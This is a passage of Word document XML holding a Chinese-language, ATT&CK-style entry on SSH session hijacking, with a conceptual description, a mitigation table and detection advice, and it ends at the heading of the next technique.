                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="555555"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B4A3F8D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="004C1A84" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="1A74FB70" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0075602F" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Secure Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统上的标准远程访问方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>它允许用户通过加密隧道连接到另一个系统，通常通过密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>证书或使用非对称加密密钥对进行身份验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DEAADE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0075602F" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>为了从受感染的主机横向移动，攻击者可以利用在活动</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>会话中通过公钥认证与其他系统建立的信任关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，来</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>劫持与另一个系统的现有连接。</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>这可能通过破坏</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>代理本身或访问代理的套接字来实现。</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>如果攻击者能够获得</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>访问权限，那么劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>会话可能是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>容易的</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>受感染的</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>代理还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用来</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>凭据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4DBC73" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>劫持与使用远程服务不同，因为它会注入现有的</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0075602F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>会话，而不是使用有效帐户创建新会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A434B49" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D21139" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="14263744" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="32AC229C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="10B89484" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="24A642A6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1922DEBB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用或删除功能或程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C77A28" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保在未明确要求此功能的系统上禁用代理转发以防止滥用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="6B68C926" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1957A649" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>密码策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5292F90A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>密钥对具有强密码，并且不使用密钥存储技术（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ssh-agent</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），除非它们受到适当保护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="401B6D70" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DF9B2D0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F4DA0B7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不允许以</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>身份或其他特权帐户通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行远程访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="658E0E76" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77423D2C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4331B8DF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保设置适当的文件权限并加强系统以防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级机会。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="5EEFF4ED" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15CDC1B3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户帐户控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118CBB09" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保所有私钥都安全地存储在只有合法所有者才能访问强密码并经常轮换的位置。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36940BD4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F02A3D" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689694C9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6DBE0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可能是合法的，具体取决于网络环境及其使用方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>其他因素（例如访问模式和远程登录后发生的活动）可能表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>存在可疑或恶意行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监控用户帐户登录到他们通常不会访问的系统或在相对较短的时间内访问多个系统的模式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监视不同用户使用的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A3D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>代理套接字文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE200E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1BF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>污</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
